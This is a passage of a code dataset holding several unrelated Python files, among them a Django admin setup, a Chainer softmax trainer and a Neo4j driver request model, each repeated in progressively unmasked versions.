(\n request[0].kwargs[\"data\"]\n == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":'\n '\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBC'\n \"A615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5\"\n \"656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512\"\n \"F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151C\"\n 'FC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n )\n request = aioresponse.requests[\n (\n \"POST\",\n URL(\n \"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2\"\n ),\n )\n ]\n assert (\n request[0].kwargs[\"data\"]\n == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":'\n '\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from simulating_blobs_of_fluid.simulation import Simulation
from simulating_blobs_of_fluid.fluid_renderer import FluidRenderer
import arcade
def main():
simulation = Simulation(particle_count=50, dt=0.016, box_width=250)
FluidRenderer(simulation.box_width, 800, simulation)
arcade.run()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "83733e707a1be131335c4980cdf4beed365eb530",
"index": 6011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from simulating_blobs_of_fluid.simulation import Simulation\nfrom simulating_blobs_of_fluid.fluid_renderer import FluidRenderer\nimport arcade\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from simulating_blobs_of_fluid.simulation import Simulation\nfrom simulating_blobs_of_fluid.fluid_renderer import FluidRenderer\n\nimport arcade\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
<|reserved_special_token_1|>
from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
<|reserved_special_token_1|>
from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
# Register your models here.
class DataResource(resources.ModelResource):
groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = ('groupname','system_name','I6000')
class DataAdmin(ImportExportMixin,admin.ModelAdmin):
list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']
resources_class = DataResource
admin.site.register(Data,DataAdmin)
|
flexible
|
{
"blob_id": "016b64a2eb4af3034d54272c878fb917506d330c",
"index": 648,
"step-1": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\nadmin.site.register(Data, DataAdmin)\n",
"step-4": "from import_export.admin import ImportExportMixin\nfrom django.contrib import admin\nfrom import_export import resources, widgets, fields\nfrom .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data\nfrom import_export import fields, resources\nfrom import_export.widgets import ForeignKeyWidget\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\nadmin.site.register(Data, DataAdmin)\n",
"step-5": "from import_export.admin import ImportExportMixin\nfrom django.contrib import admin\nfrom import_export import resources, widgets, fields\nfrom .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data\nfrom import_export import fields, resources\nfrom import_export.widgets import ForeignKeyWidget\n# Register your models here.\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n class Meta:\n fields = ('groupname','system_name','I6000')\n\nclass DataAdmin(ImportExportMixin,admin.ModelAdmin):\n list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']\n resources_class = DataResource\n\n\nadmin.site.register(Data,DataAdmin)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer():
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == "Adam":
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy',
'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
|
normal
|
{
"blob_id": "474700968e563d34d6a0296ec62950e2e71fe1b0",
"index": 1671,
"step-1": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-4": "import chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\n\nclass SoftMaxTrainer:\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=\n False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == 'Adam':\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=\n out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,\n device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss',\n 'validation/main/loss'], 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy',\n 'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',\n 'validation/main/loss', 'main/accuracy',\n 'validation/main/accuracy', 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport chainer.links as L\nimport chainer.functions as F\nfrom chainer import optimizer, optimizers, training, iterators\nfrom chainer.training import extensions\nfrom chainer.datasets import tuple_dataset\n\nclass SoftMaxTrainer():\n\n def __init__(self, net):\n self.model = L.Classifier(net)\n\n def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):\n train = tuple_dataset.TupleDataset(train_x, train_t)\n test = tuple_dataset.TupleDataset(valid_x, valid_t)\n self.train_iter = iterators.SerialIterator(train, n_batch)\n self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)\n\n def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):\n if opt_name == \"Adam\":\n opt = getattr(optimizers, opt_name)()\n else:\n opt = getattr(optimizers, opt_name)(lr)\n opt.setup(self.model)\n opt.add_hook(optimizer.GradientClipping(g_clip))\n\n updater = training.StandardUpdater(self.train_iter, opt, device=gpu)\n self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)\n self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))\n self.trainer.extend(extensions.dump_graph('main/loss'))\n self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))\n self.trainer.extend(extensions.LogReport())\n self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],\n 'epoch', file_name='loss.png'))\n self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],\n 'epoch', file_name='accuracy.png'))\n self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',\n 'main/accuracy', 'validation/main/accuracy',\n 'elapsed_time']))\n self.trainer.extend(extensions.ProgressBar())\n\n def start(self):\n self.trainer.run()\n\n def predict(self, x):\n pred = F.softmax(self.model.predictor(x, train=False))\n return pred.data\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""
All requests will be sent to backend as:
{
name: <class name>,
data: {
<all instance variables>
}
}
"""
class NewDriver:
def __init__(self, uri, authToken):
self.uri = uri
self.authorizationToken = authToken
class DriverClose:
def __init__(self, driverId):
self.driverId = driverId
class NewSession:
def __init__(self, driverId, accessMode, bookmarks):
self.driverId = driverId
self.accessMode = accessMode
self.bookmarks = bookmarks
class SessionClose:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Response should be Result model or raised Error model
"""
class SessionRun:
def __init__(self, sessionId, cypher, params):
self.sessionId = sessionId
self.cypher = cypher
self.params = params
class SessionReadTransaction:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a positive intent from the client application to commit the retryable transaction
"""
class RetryablePositive:
def __init__(self, sessionId):
self.sessionId = sessionId
"""
Indicates a negative intent from the client application to commit the retryable transaction
"""
class RetryableNegative:
def __init__(self, sessionId, errorId=""):
self.sessionId = sessionId
self.errorId = errorId
class TransactionRun:
def __init__(self, txId, cypher, params):
self.txId = txId
self.cypher = cypher
self.params = params
"""
Response should be Record model, NullRecord to indicate last record or raised Error model if record
couldn't be retrieved.
"""
class ResultNext:
def __init__(self, resultId):
self.resultId = resultId
class AuthorizationToken:
def __init__(self, scheme="none", principal="", credentials="", realm="", ticket=""):
self.scheme=scheme
self.principal=principal
self.credentials=credentials
self.realm=realm
self.ticket=ticket
|
normal
|
{
"blob_id": "dfcb095b26a21ba0c8ccc2a2c664bcfab29b8351",
"index": 8214,
"step-1": "<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-2": "<mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-3": "<mask token>\n\n\nclass NewSession:\n <mask token>\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-4": "<mask token>\n\n\nclass DriverClose:\n <mask token>\n\n\nclass NewSession:\n\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass SessionRun:\n\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryablePositive:\n\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n<mask token>\n\n\nclass RetryableNegative:\n\n def __init__(self, sessionId, errorId=''):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n<mask token>\n\n\nclass ResultNext:\n\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n\n def __init__(self, scheme='none', principal='', credentials='', realm=\n '', ticket=''):\n self.scheme = scheme\n self.principal = principal\n self.credentials = credentials\n self.realm = realm\n self.ticket = ticket\n",
"step-5": "\n\"\"\"\nAll requests will be sent to backend as:\n {\n name: <class name>,\n data: {\n <all instance variables>\n }\n }\n\"\"\"\n\nclass NewDriver:\n def __init__(self, uri, authToken):\n self.uri = uri\n self.authorizationToken = authToken\n\n\nclass DriverClose:\n def __init__(self, driverId):\n self.driverId = driverId\n\n\nclass NewSession:\n def __init__(self, driverId, accessMode, bookmarks):\n self.driverId = driverId\n self.accessMode = accessMode\n self.bookmarks = bookmarks\n\n\nclass SessionClose:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nResponse should be Result model or raised Error model\n\"\"\"\nclass SessionRun:\n def __init__(self, sessionId, cypher, params):\n self.sessionId = sessionId\n self.cypher = cypher\n self.params = params\n\n\nclass SessionReadTransaction:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a positive intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryablePositive:\n def __init__(self, sessionId):\n self.sessionId = sessionId\n\n\n\"\"\"\nIndicates a negative intent from the client application to commit the retryable transaction\n\"\"\"\nclass RetryableNegative:\n def __init__(self, sessionId, errorId=\"\"):\n self.sessionId = sessionId\n self.errorId = errorId\n\n\nclass TransactionRun:\n def __init__(self, txId, cypher, params):\n self.txId = txId\n self.cypher = cypher\n self.params = params\n\n\n\"\"\"\nResponse should be Record model, NullRecord to indicate last record or raised Error model if record\ncouldn't be retrieved.\n\"\"\"\nclass ResultNext:\n def __init__(self, resultId):\n self.resultId = resultId\n\n\nclass AuthorizationToken:\n def __init__(self, scheme=\"none\", principal=\"\", credentials=\"\", realm=\"\", ticket=\"\"):\n self.scheme=scheme\n self.principal=principal\n self.credentials=credentials\n self.realm=realm\n self.ticket=ticket\n\n",
"step-ids": [
14,
16,
17,
19,
23
]
}
|
[
14,
16,
17,
19,
23
] |
from django.contrib import admin
from xchanger.models import Currency, Rates, UpdateInfo
class CurrencyAdmin(admin.ModelAdmin):
pass
class UpdAdmin(admin.ModelAdmin):
pass
class RatesAdmin(admin.ModelAdmin):
list_filter = ['c_code_id', 'upd_id']
admin.site.register(Currency, CurrencyAdmin)
admin.site.register(UpdateInfo, UpdAdmin)
admin.site.register(Rates, RatesAdmin)
|
normal
|
{
"blob_id": "20ccdd319bfbbb4f17e8518eb60d125112c05d8e",
"index": 6828,
"step-1": "<mask token>\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CurrencyAdmin(admin.ModelAdmin):\n pass\n\n\nclass UpdAdmin(admin.ModelAdmin):\n pass\n\n\nclass RatesAdmin(admin.ModelAdmin):\n list_filter = ['c_code_id', 'upd_id']\n\n\n<mask token>\n",
